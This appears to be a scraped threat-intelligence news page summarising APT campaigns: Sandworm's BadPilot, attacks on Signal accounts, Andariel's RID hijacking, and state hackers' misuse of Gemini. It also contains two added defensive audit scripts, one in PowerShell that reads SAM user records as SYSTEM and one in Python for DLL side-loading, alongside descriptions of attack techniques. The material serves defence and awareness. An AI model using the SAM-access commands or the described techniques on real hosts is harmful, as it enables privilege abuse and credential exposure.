What's new around the internet

Latest

Each entry below is listed as: Source | Date (GMT) | Title, followed by the description, then Tags | Stories | Rating.
Blog | 2025-04-29 11:04:11 | Spain's blackout: Cyber or Not? An unbiased technical analysis

Introduction

Yesterday afternoon, I was writing what should have been the regular newsletter when the power suddenly went out. I wasn't alarmed at all because I live in a mountain area, and power outages like this happen several times a year. It was a slightly windy day, so I assumed that maybe a tree had cracked and hit a low-voltage line or something similar. But, as it turns out, that wasn't the case. Instead, something unprecedented occurred, a 'zero energy' event: the power grid in Spain and Portugal went down completely.

As we can see from the following graph from Red Eléctrica Española (the transmission system operator responsible for managing the Spanish electricity system), at 12:35pm 15 GW of generation suddenly went 'missing'. As the prime minister explained during a press release: "in 5 seconds, 60% of the country's demand disappeared from the system".

The interconnected power system is one of the most complex systems ever built. It is beyond the scope of this article to provide a detailed technical assessment of all possible non-cyber scenarios that could contribute to a 'black swan' event. In fact, investigations into large-scale power outages typically take months to reach reliable conclusions. Therefore, I will leave this task to the experts, who have access to the necessary data to conduct such a complex analysis.

However, there is specific information suggesting that a potential cyber attack could be behind this. For example:

https://www.larazon.es/economia/cni-apunta-ciberataque-como-posible-causa-apagon_20250428680f7e19319ae75da4ba8c32.html

The President of the regional government of Andalusia (Spain) claims that, after consulting with cybersecurity experts, the massive power outage is likely the result of a cyber attack.

https://www.eleconomista.es/energia/noticias/13337515/04/25/juanma-moreno-apunta-a-un-ciberataque-como-posible-causa-del-gran-apagon-en-espana.html

Meanwhile, top European figures such as the European Council p

Tags: Ransomware, Malware, Threat, Studies, Prediction, Technical | Stories: APT 44 | Rating: ★★★
Blog | 2025-04-18 11:53:49 | KeyPlug Malware Server Leak Exposes Fortinet Firewall and VPN Exploitation Tools

Cybersecurity researchers have stumbled upon a treasure trove of operational tools and scripts linked to the KeyPlug malware, associated with the threat group RedGolf, also known as APT41. The server, which was inadvertently exposed for less than 24 hours, provided an unprecedented glimpse into the sophisticated tactics, techniques, and procedures (TTPs) employed by this advanced […]

Tags: Malware, Tool, Threat | Stories: APT 41 | Rating: ★★★
Cyble | 2025-04-15 08:22:39 | Hacktivists Target Critical Infrastructure, Move Into Ransomware

Overview: According to a new Cyble report, hacktivists are increasingly moving beyond traditional activities such as DDoS attacks and website defacements into more sophisticated critical-infrastructure and ransomware attacks. In a report for clients, Cyble said that hacktivism has "transformed into a complex instrument of hybrid warfare" with the rise of groups that have adopted more sophisticated attack techniques usually associated with nation-state actors and financially motivated threat groups. Hacktivism "is no longer confined to fringe ideological outbursts," according to the report. "It is now a decentralized cyber-insurgency apparatus, capable of shaping geopolitical narratives, destabilizing critical systems, and engaging directly in global conflicts across the digital domain." The Cyble report examined the most active hacktivist groups in the first quarter of 2025, the most targeted nations and sectors, emerging attack techniques, and more.

The most active hacktivist groups target critical infrastructure: pro-Russian hacktivists were the most active in the first quarter, led by NoName057(16),

Tags: Hacktivist, Sandworm, Ransomware, Tool, Vulnerability, Threat, Legislation, Industrial, Prediction, Cloud, Technical | Stories: APT 44 | Rating: ★★★
Cyble | 2025-02-20 13:21:16 | (Déjà vu) Russia-Linked Actors Exploiting Signal Messenger's "Linked Devices" Feature for Espionage in Ukraine

Overview: Google Threat Intelligence Group (GTIG) has identified multiple Russia-aligned threat actors actively targeting Signal Messenger accounts as part of a multi-year cyber espionage operation. The campaign, likely driven by Russia's intelligence-gathering objectives during its invasion of Ukraine, aims to compromise the secure communications of military personnel, politicians, journalists, and activists. The tactics observed in this campaign include phishing attacks abusing Signal's linked devices feature, malicious JavaScript payloads, and malware designed to steal Signal messages from compromised Android and Windows devices. While the focus remains on Ukrainian targets, the threat is expected to expand globally as adversaries refine their techniques. Google has partnered with Signal to introduce security enhancements that mitigate these attack vectors, urging users to update to the latest versions of the app.

Tactics Used to Compromise Signal Accounts

Exploiting Signal's "Linked Devices" Feature: Russia-aligned threat actors have manipulated Signal's legitimate linked devices functionality to gain persistent access to victim accounts. By tricking users into scanning malicious QR codes, attackers can link an actor-controlled device to the victim's account, enabling real-time message interception without full device compromise. The phishing methods used to deliver these malicious QR codes include:
- Fake Signal group invites containing altered JavaScript redirects.
- Phishing pages masquerading as Ukrainian military applications.

Tags: Malware, Tool, Vulnerability, Threat, Mobile, Cloud, Conference | Stories: APT 44 | Rating: ★★
Mandiant | 2025-02-19 14:00:00 | Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger

Written by: Dan Black

Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near term and proliferate to additional threat actors and regions outside the Ukrainian theater of war. Signal's popularity among common targets of surveillance and espionage activity, such as military personnel, politicians, journalists, activists, and other at-risk communities, has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats. We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.

Phishing Campaigns Abusing Signal's "Linked Devices" Feature

The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real time, providing a persistent means to eavesdrop on the victim's secure conversations without the need for full-device compromise.

Tags: Malware, Threat, Mobile, Cloud, Commercial | Stories: APT 44 | Rating: ★★
The Hackers News | 2025-02-18 15:22:00 | Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign

The China-linked threat actor known as Winnti has been attributed to a new campaign dubbed RevivalStone that targeted Japanese companies in the manufacturing, materials, and energy sectors in March 2024. The activity, detailed by Japanese cybersecurity company LAC, overlaps with a threat cluster tracked by Trend Micro as Earth Freybug, which has been assessed to be a subset within the APT41

Tags: Threat, Prediction | Stories: APT 41 | Rating: ★★★
IndustrialCyber | 2025-02-13 22:27:57 | Microsoft details Seashell Blizzard BadPilot campaign targeting energy, telecom, government sectors

Microsoft has published its first research on a subgroup within the Russian state actor Seashell Blizzard, detailing a...

Stories: APT 44 | Rating: ★★★★
Blog | 2025-02-13 21:27:54 | Microsoft Uncovers 'BadPilot' Campaign as Seashell Blizzard Targets US and UK

Russian GRU-linked hackers exploit known software flaws to breach critical networks worldwide, targeting the United States and the…

Tags: Threat | Stories: APT 44 | Rating: ★★★
The Hackers News | 2025-02-13 19:56:00 | North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks

A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet

Tags: Threat | Stories: APT 43 | Rating: ★★★
InfoSecurityMag | 2025-02-13 12:00:00 | Russian Seashell Blizzard Enlists Specialist Initial Access Subgroup to Expand Ops

Microsoft found that Russian state actor Seashell Blizzard has deployed an initial access subgroup to gain persistent access in a range of high-value global targets

Stories: APT 44 | Rating: ★★★
no_ico | 2025-02-13 06:02:16 | Russia-Linked Seashell Blizzard Intensifies Cyber Operations Against Critical Sectors

The Russia-linked threat actor known as Seashell Blizzard has assigned one of its subgroups to gain initial access to internet-facing infrastructure and establish long-term persistence within targeted entities, a Microsoft report has revealed. Also dubbed APT44, BlackEnergy Lite, Sandworm, Telebots, and Voodoo Bear, Seashell Blizzard has been active since at least 2009 and is believed [...]

Tags: Threat | Stories: APT 44 | Rating: ★★★
The Hackers News | 2025-02-12 22:32:00 | Microsoft Uncovers Sandworm Subgroup's Global Cyber Attacks Spanning 15+ Countries

A subgroup within the infamous Russian state-sponsored hacking group known as Sandworm has been attributed to a multi-year initial access operation dubbed BadPilot that stretched across the globe. "This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations," the

Stories: APT 44 | Rating: ★★★
RecordedFuture | 2025-02-12 18:14:48 | Subgroup of Russia's Sandworm compromising US and European organizations, Microsoft says

The BadPilot hackers have expanded their focus beyond Ukraine and Eastern Europe, gaining initial access to dozens of strategically important organizations across the U.S. and U.K.

Stories: APT 44 | Rating: ★★★
CyberScoop | 2025-02-12 17:58:47 | Russian state threat group shifts focus to US, UK targets

A subgroup of Seashell Blizzard exploited public vulnerabilities in internet-facing systems, Microsoft researchers said.

Tags: Vulnerability, Threat | Stories: APT 44 | Rating: ★★★
DarkReading | 2025-02-12 17:00:00 | Microsoft: Russia's Sandworm APT Exploits Edge Bugs Globally

Sandworm (aka Seashell Blizzard) has an initial access wing called "BadPilot" that uses standard intrusion tactics to spread Russia's tendrils around the world.

Stories: APT 44 | Rating: ★★★
Mandiant | 2025-02-11 20:00:00 | Cybercrime: A Multifaceted National Security Threat

Executive Summary

Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders' resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions.

A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare's share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks means that they must be taken seriously as a national security threat, no matter the motivation of the actors behind them.

Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel the cyber support to its war in Ukraine. GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine, and CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims' crypto wallets.

Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups, often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and public and private sectors on systemic solutions such as increasing education and resilience efforts.

Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Legislation, Medical, Cloud, Technical | Stories: APT 41, APT 38, APT 29, APT 43, APT 44 | Rating: ★★★
TechWorm | 2025-01-31 19:21:04 | Hackers From China, North Korea, Iran & Russia Are Using Google's AI For Cyber Ops

Google's Threat Intelligence Group (GTIG) has issued a warning that state-backed attackers from China, Iran, Russia, North Korea, and over a dozen other countries are using its artificial intelligence (AI) application, Gemini, to boost their hacking capabilities. According to the GTIG report, published on Wednesday, state-sponsored hackers have been using the Gemini chatbot to improve their productivity in cyber espionage, phishing campaigns, and other malicious activities. Google examined Gemini activity linked to known APT (Advanced Persistent Threat) actors and found that APT groups from over twenty countries have been using large language models (LLMs) primarily for research, target reconnaissance, the development of malicious code, and the creation and localization of content like phishing emails. In other words, these hackers seem to use Gemini mainly as a research tool to enhance their operations rather than to develop entirely new hacking methods. Currently, no hacker has successfully leveraged Gemini to develop entirely new cyberattack methods.

"While AI can be a useful tool for threat actors, it is not yet the gamechanger it is sometimes portrayed to be. While we do see threat actors using generative AI to perform common tasks like troubleshooting, research, and content generation, we do not see indications of them developing novel capabilities," Google said in its report.

Google tracked this activity to more than ten Iran-backed groups, more than twenty China-backed groups, and nine North Korean-backed groups. Iranian threat actors were the biggest users of Gemini, using it for a wide range of purposes, including research on defense organizations, vulnerability research, and creating content for campaigns. In particular, the group APT42 (which accounted for over 30% of Iranian APT activity) focused on crafting phishing campaigns to target government agencies and corporations, conducting reconnaissance on defense experts and organizations, and generating content with cybersecurity themes.

Chinese APT groups primarily used Gemini to conduct reconnaissance, write and develop scripts, troubleshoot code, and research how to obtain deeper access to target networks through lateral movement, privilege escalation, data exfiltration, and detection evasion.

North Korean APT hackers were observed using Gemini to support multiple phases of the attack lifecycle, including researching potential infrastructure and free hosting providers, reconnaissance on target organizations, payload development, and help with malicious scripting and evasion methods. "Of note, North Korean actors also used Gemini to draft cover letters and research jobs, activities that would likely support North Korea's efforts to place clandestine IT workers at Western companies," the company noted. "One North Korea-backed group utilized Gemini to draft cover letters and proposals for job descriptions, researched average salaries for specific jobs, and asked about jobs on LinkedIn. The group also used Gemini for information about overseas employee exchanges. Many of the topics would be common for anyone researching and applying for jobs."

Meanwhile, Russian APT actors demonstrated limited use of Gemini, primarily for coding tasks such as converting publicly available malware into different programming languages and incorporating encryption functions into existing code. They may have avoided using Gemini for operational security reasons, opting to stay off Western-controlled platforms to avoid monitoring of their activities, or using Russian-made AI tools. Google said the Russian groups' use of Gemini has been relatively limited, possibly because they sought to prevent Western platforms from monitoring their activities.

Tags: Malware, Tool, Vulnerability, Threat, Legislation, Cloud | Stories: APT 42 | Rating: ★★★
Mandiant | 2025-01-29 14:00:00 | Adversarial Misuse of Generative AI

Rapid advancements in artificial intelligence (AI) are unlocking new possibilities for the way we work and accelerating innovation in science, technology, and beyond. In cybersecurity, AI is poised to transform digital defense, empowering defenders and enhancing our collective security. Large language models (LLMs) open new possibilities for defenders, from sifting through complex telemetry to secure coding, vulnerability discovery, and streamlining operations. However, some of these same AI capabilities are also available to attackers, leading to understandable anxieties about the potential for AI to be misused for malicious purposes.

Much of the current discourse around cyber threat actors' misuse of AI is confined to theoretical research. While these studies demonstrate the potential for malicious exploitation of AI, they don't necessarily reflect the reality of how AI is currently being used by threat actors in the wild. To bridge this gap, we are sharing a comprehensive analysis of how threat actors interacted with Google's AI-powered assistant, Gemini. Our analysis was grounded by the expertise of Google's Threat Intelligence Group (GTIG), which combines decades of experience tracking threat actors on the front lines and protecting Google, our users, and our customers from government-backed attackers, targeted 0-day exploits, coordinated information operations (IO), and serious cyber crime networks. We believe the private sector, governments, educational institutions, and other stakeholders must work together to maximize AI's benefits while also reducing the risks of abuse. At Google, we are committed to developing responsible AI guided by our principles, and we share

Tags: Ransomware, Malware, Tool, Vulnerability, Threat, Studies, Legislation, Mobile, Industrial, Cloud, Technical, Commercial | Stories: APT 41, APT 43, APT 42 | Rating: ★★★
Mandiant | 2025-01-28 14:00:00 | ScatterBrain: Unmasking the Shadow of PoisonPlug's Obfuscator

Written by: Nino Isakovic

Introduction

Since 2022, Google Threat Intelligence Group (GTIG) has been tracking multiple cyber espionage operations conducted by China-nexus actors utilizing POISONPLUG.SHADOW. These operations employ a custom obfuscating compiler that we refer to as "ScatterBrain," facilitating attacks against various entities across Europe and the Asia Pacific (APAC) region. ScatterBrain appears to be a substantial evolution of ScatterBee, an obfuscating compiler previously analyzed by PwC. GTIG assesses that POISONPLUG is an advanced modular backdoor used by multiple distinct, but likely related, threat groups based in the PRC; however, we assess that POISONPLUG.SHADOW usage appears to be further restricted to clusters associated with APT41.

GTIG currently tracks three known POISONPLUG variants: POISONPLUG, POISONPLUG.DEED, and POISONPLUG.SHADOW.

POISONPLUG.SHADOW, often referred to as "Shadowpad," a malware family name first introduced by Kaspersky, stands out due to its use of a custom obfuscating compiler specifically designed to evade detection and analysis. Its complexity is compounded not only by the extensive obfuscation mechanisms employed but also by the attackers' highly sophisticated tradecraft. These elements collectively make analysis exceptionally challenging and complicate efforts to identify, understand, and mitigate the threats it poses. In addressing these challenges, GTIG collaborates closely with the FLARE team to dissect and analyze POISONPLUG.SHADOW. This partnership utilizes state-of-the-art reverse engineering techniques and comprehensive threat intelligence capabilities required to mitigate the sophisticated threats posed by this threat actor. We remain dedicated to advancing methodologies and fostering innovation to adapt to and counteract the ever-evolving tactics of threat actors, ensuring the security of Google and our customers against sophisticated cyber espionage operations.

Overview

In this blog post, we present our in-depth analysis of the ScatterBrain obfuscator, which has led to the development of a complete stand-alone static deobfuscator library independent of any binary analysis frameworks. Our analysis is based solel

Tags: Malware, Tool, Threat, Studies, Patching, Cloud | Stories: APT 41 | Rating: ★★
TechWorm | 2025-01-25 20:07:25 | Hackers Using RID Hijacking To Create Admin Accounts In Windows

Cybersecurity researchers at AhnLab have discovered that a North Korean threat group uses malicious files to hijack RIDs and grant admin access to low-privilege Windows accounts. According to researchers at ASEC, AhnLab's security intelligence center, the group behind the attack is "Andariel", linked to North Korea's Lazarus group.

"RID Hijacking is an attack technique that involves modifying the RID value of an account with low privileges, such as a regular user or a guest account, to match the RID value of an account with higher privileges (Administrator). By modifying the RID value, threat actors can deceive the system into treating the account as having administrator privileges," AhnLab wrote in a blog post published on Thursday.

In Windows, a Relative Identifier (RID) is the part of a Security Identifier (SID) that uniquely distinguishes each user and group within a domain. For instance, the built-in administrator account has RID 500, the guest account 501, the Domain Admins group 512, and regular users are assigned RIDs starting at 1000.

In a RID hijacking attack, attackers change the RID of a low-privilege account to the same value as the administrator account, so that Windows grants administrative privileges to that account. To pull this off, attackers need write access to the SAM (Security Account Manager) registry hive, which requires them to already have SYSTEM-level access to the targeted machine. Attackers typically use tools such as PsExec and JuicyPotato to escalate their privileges and launch a SYSTEM-level command prompt.

While SYSTEM is the highest privilege level in Windows, it has certain limitations: it doesn't allow remote access, cannot interact with GUI apps, generates noisy activity that can be easily detected, and doesn't persist after a reboot. To work around these issues, Andariel first created a hidden, low-privilege local user account by appending a "$" character to its username. This made the account invisible in regular listings but still accessible in the SAM registry. The attackers then carried out RID hijacking to escalate the account's privileges to administrator level. According to the researchers, Andariel added the modified account to the Remote Desktop Users and Administrators groups, giving them more control over the system. The group modified the SAM registry using custom malware and an open-source tool to execute the RID hijacking.

Although SYSTEM access would allow the direct creation of administrator accounts, this method is less conspicuous, making it harder to detect and prevent. To avoid detection, Andariel also exported and backed up the modified registry settings, deleted the rogue account, and restored it later from the backup when needed, bypassing system logs and making detection even harder.

To reduce the risk of RID hijacking, system administrators should implement proactive measures such as:
- Using the Local Security Authority (LSA) Subsystem Service to monitor unusual login attempts and password changes.
- Preventing unauthorized access to the SAM registry.
- Restricting the use of tools like PsExec and JuicyPotato.
- Disabling guest accounts.
- Enforcing multi-factor authentication (MFA) for all user accounts, including low-privileged ones.

Tags: Malware, Tool, Threat | Stories: APT 38, APT 45 | Rating: ★★
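An added host-audit example, written for this page and not taken from the AhnLab or TechWorm write-ups, that looks for the three artifacts the entry above describes: local account names ending in "$", SAM user records whose stored RID disagrees with the RID in the record's key name (the signature of a hijacked account), and "$"-suffixed members of the Administrators and Remote Desktop Users groups. It assumes the RID field sits at offset 0x30 of each user record's binary F value under HKLM\SAM\SAM\Domains\Account\Users, which is where the public RID-hijacking research places it; the function names are mine. HKLM\SAM is readable only by SYSTEM, so run it from a SYSTEM shell (for example psexec -s -i powershell.exe) on a host you are authorized to examine.

```powershell
# Added example, not part of the AhnLab/TechWorm article. Audits a Windows host for the
# artifacts of the RID-hijacking chain described above. Must run as SYSTEM because
# HKLM\SAM is ACL'd to SYSTEM only (e.g. psexec -s -i powershell.exe).
# Assumption (from public RID-hijacking research): the RID is stored as a little-endian
# DWORD at offset 0x30 of the binary "F" value of HKLM\SAM\SAM\Domains\Account\Users\<RID>.

$SamUsersPath = 'HKLM:\SAM\SAM\Domains\Account\Users'
$RidOffset    = 0x30

function Get-SamRidMismatch {
    # Compare the RID in each user record's key name (8-digit hex) with the RID stored
    # inside its F value. A hijacked account keeps its original key name
    # (e.g. 000003E9 = 1001) but carries 500 (Administrator) inside F.
    param([string]$Path = $SamUsersPath)
    $findings = @()
    foreach ($key in Get-ChildItem -Path $Path -ErrorAction Stop) {
        if ($key.PSChildName -notmatch '^[0-9A-Fa-f]{8}$') { continue }   # skip the "Names" key
        $keyRid = [Convert]::ToUInt32($key.PSChildName, 16)
        $f = (Get-ItemProperty -Path $key.PSPath -Name 'F' -ErrorAction SilentlyContinue).F
        if (-not $f -or $f.Length -lt ($RidOffset + 4)) { continue }
        $storedRid = [BitConverter]::ToUInt32($f, $RidOffset)
        if ($storedRid -ne $keyRid) {
            $findings += [pscustomobject]@{
                KeyRid    = $keyRid
                StoredRid = $storedRid
                Note      = $(if ($storedRid -eq 500) { 'treated as built-in Administrator' } else { 'RID mismatch' })
            }
        }
    }
    $findings
}

function Get-HiddenLocalAccount {
    # "net user" omits account names ending in "$"; the SAM Names key still lists them.
    param([string]$Path = $SamUsersPath)
    Get-ChildItem -Path (Join-Path $Path 'Names') -ErrorAction Stop |
        Where-Object { $_.PSChildName -like '*$' } |
        ForEach-Object { $_.PSChildName }
}

function Get-HiddenGroupMember {
    # "$"-suffixed members of the two groups the attackers placed their account in.
    foreach ($group in 'Administrators', 'Remote Desktop Users') {
        Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -like '*$' } |
            ForEach-Object { [pscustomobject]@{ Group = $group; Member = $_.Name; SID = $_.SID.Value } }
    }
}

$mismatches = @(Get-SamRidMismatch)
$hidden     = @(Get-HiddenLocalAccount)
$members    = @(Get-HiddenGroupMember)

if ($mismatches.Count) { $mismatches | Format-Table -AutoSize } else { 'No RID mismatches in SAM.' }
if ($hidden.Count)     { 'Hidden local accounts: ' + ($hidden -join ', ') } else { 'No $-suffixed local accounts.' }
if ($members.Count)    { $members | Format-Table -AutoSize } else { 'No $-suffixed members of Administrators / Remote Desktop Users.' }
```

Because the attackers delete the account and restore it from a registry backup when they need it, a single clean run proves little; schedule the check and baseline the Names key so a reappearing "$" account or a new RID mismatch stands out. Group-membership changes also surface in the Security log (member-added events for local groups), which complements the SAM comparison when the hive itself has been tampered with.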
RiskIQ.webp 2024-12-30 19:16:07 Analysis of Attack Cases Against Korean Solutions by the Andariel Group (SmallTiger) (lien direct) ## Snapshot ASEC reports that the Andariel threat group has resumed attacks to distribute SmallTiger malware, targeting Korean software solutions, including asset management and document management tools. ## Description ASEC reports that the Andariel group (tracked by Microsoft as [Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0)) exploits vulnerabilities in asset management solutions to gain control over systems. Most of these attacks resulted in the installation of ModeLoader. In one case, the attackers used [brute-force](https://security.microsoft.com/threatanalytics3/d44f2c6d-6901-4967-82b7-7ffe4f7276e7/overview) and dictionary attacks on exposed update servers to replace update programs with malicious versions, enabling them to distribute SmallTiger. In recent cases, researchers have found SmallTiger in the installation paths of asset management solutions alongside a keylogger. This keylogger stored captured keystrokes in the temporary file "MsMpLog.tmp." The attackers also configured infected systems for future Remote Desktop Protocol (RDP) access. Additionally, they deployed an open-source tool called CreateHiddenAccount to add and conceal a backdoor account. The threat group also targets document management solutions by exploiting outdated Apache Tomcat web servers. After gaining initial access, they query system information and install an Advanced Port Scanner. They then install a web shell via PowerShell commands with the download server also identified as the command-and-control server address for SmallTiger. 
## Microsoft Analysis and Additional OSINT Context [Microsoft researchers determined](https://www.microsoft.com/en-us/security/blog/2024/07/25/onyx-sleet-uses-array-of-malware-to-gather-intelligence-for-north-korea/) that SmallTiger is a C++ backdoor with layered obfuscation, encountered in the wild as a Themida- or VMProtect-packed executable. [In February 2024](https://asec.ahnlab.com/ko/73907/), ASEC first identified SmallTiger targeting South Korean defense and manufacturing organizations. Subsequently, in May 2024, Microsoft observed Onyx Sleet conducting attacks using SmallTiger, specifically targeting South Korean defense organizations. Onyx Sleet is a North Korea-affiliated activity group that conducts cyber espionage through numerous campaigns with the goal of intelligence gathering and financial gain. The threat actor utilizes a wide range of custom tools and malware while maintaining a consistent attack chain, especially against organizations of interest to North Korean intelligence, such as those in the defense, engineering, and energy sectors. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat.  - Maintain good [cyber hygiene](https://www.microsoft.com/en-us/microsoft-365-life-hacks/privacy-and-safety/cyber-hygiene) and follow online safety best practices to help prevent keylogging. - Install antivirus software. Many antivirus software options now include anti-keylogger and anti-spyware protection. This software can help you identify and avoid keylogging malware. Installing and keeping antivirus software up to date helps prevent data theft. - Regularly update security settings, and if a device is no longer receiving updates, strongly consider replacing it with a new device. 
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants. - Avoid downloading files from unsafe websites or clicking links in an email from an unknown sender. Phishing has become more sophisticated, so you should be cautious of clicking links or downloading attachments from peopl Malware Tool Vulnerability Threat APT 45 ★★
Netskope.webp 2024-12-13 15:00:00 New Yokai Side-loaded Backdoor Targets Thai Officials (lien direct) >Summary DLL side-loading is a popular technique used by threat actors to execute malicious payloads under the umbrella of a benign, usually legitimate, executable. This allows the threat actor to exploit whitelists in security products that exclude trusted executables from detection. Among others, this technique has been leveraged by APT41 to deploy DUSTTRAP and Daggerfly […]
Threat APT 41 ★★★
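The side-loading described above works because the loader searches the executable's own directory before System32 for anything that is not a KnownDLL. The following is an added example (not code from Netskope or from the Yokai report) that applies that search order to an executable's import list and the contents of the directory it was dropped in, flagging imports that resolve from the application directory while a system DLL of the same name exists (the classic side-loading layout) and imports that resolve nowhere (plantable). The KnownDLLs subset, the import names and the directory listings are constructed.

```python
from dataclasses import dataclass

# Representative subset of the KnownDLLs list (assumption: read the live list from
# HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs for a real audit).
# The loader maps these from System32 no matter what sits next to the EXE, so they
# cannot be side-loaded by shadowing.
KNOWN_DLLS = {
    "ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll", "gdi32.dll",
    "advapi32.dll", "ole32.dll", "oleaut32.dll", "shell32.dll", "combase.dll",
    "rpcrt4.dll", "sechost.dll", "msvcrt.dll", "ws2_32.dll", "shlwapi.dll",
}


@dataclass
class ImportFinding:
    dll: str
    resolved_from: str  # "knowndll", "app_dir", "system_dir" or "missing"
    risk: str           # "none", "sideload", "review" or "plantable"


def resolve_import(dll: str, app_dir_files: set, system_files: set) -> ImportFinding:
    """Walk the default (SafeDllSearchMode) search order for one imported DLL name."""
    name = dll.lower()
    if name in KNOWN_DLLS:
        return ImportFinding(name, "knowndll", "none")
    if name in app_dir_files:
        # The application directory is searched before System32, so a copy here wins
        # even when a legitimate DLL of the same name exists in System32. A system DLL
        # name shadowed beside a signed EXE is the classic side-loading layout.
        return ImportFinding(name, "app_dir", "sideload" if name in system_files else "review")
    if name in system_files:
        return ImportFinding(name, "system_dir", "none")
    # Not found anywhere on the search path: if the EXE survives the failed load,
    # an attacker who can write to the application directory can plant it.
    return ImportFinding(name, "missing", "plantable")


def audit_imports(imports, app_dir_files, system_files) -> list:
    app = {f.lower() for f in app_dir_files}
    system = {f.lower() for f in system_files}
    return [resolve_import(d, app, system) for d in imports]


# Constructed sample: a signed updater dropped into a folder with one shadowed system
# DLL and one private DLL (import names as they would appear in the EXE's import table).
SAMPLE_IMPORTS = ["KERNEL32.dll", "USER32.dll", "VERSION.dll", "libcurl.dll", "MSVCP140.dll", "plugin.dll"]
SAMPLE_APP_DIR = {"updater.exe", "version.dll", "libcurl.dll"}
SAMPLE_SYSTEM32 = {"kernel32.dll", "user32.dll", "version.dll", "msvcp140.dll"}

if __name__ == "__main__":
    for f in audit_imports(SAMPLE_IMPORTS, SAMPLE_APP_DIR, SAMPLE_SYSTEM32):
        if f.risk != "none":
            print(f)
```

In a real audit the import list comes from the executable's import table (for example via a PE parser) and the directory listings from the host; the point of the example is the ordering logic, which is why a shadowed `version.dll` is ranked above a private DLL such as `libcurl.dll` that the application legitimately ships.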
RiskIQ.webp 2024-12-11 22:38:07 Likely China-based Attackers Target High-profile Organizations in Southeast Asia (lien direct) #### Targeted Geolocations - Southeast Asia #### Targeted Industries - Government Agencies & Services - Transportation Systems - Aviation - Communications Infrastructure ## Snapshot Researchers at Symantec detailed an espionage campaign, active since at least October 2023, likely conducted by China-based threat actors. The campaign targeted organizations in a number of industries, including government, telecommunications, and aviation. ## Description The attackers employed a mix of open-source (e.g., Dismap, [Impacket](https://security.microsoft.com/intel-profiles/19a4861eb55c4c074ab0a8c6f58738d8f50dda8badf96695758399e3d826dda6), and FastReverseProxy) and living-off-the-land (e.g., PowerShell, Reg.exe, and Windows Management Instrumentation) tools in their attacks. Many of these tools have been previously observed in attacks attributed to Chinese actors, including Rakshasa, a tool previously used by Earth Baku, and SharpNBTScan, a .NET application previously used by Mustang Panda (tracked by Microsoft as [Twill Typhoon](https://security.microsoft.com/intel-profiles/01aef6bb1a4cd12178aca7fceb848002164b83bf375fa33699ed4c5523b4fd3c)).  The operations focused on exfiltrating data of interest, including 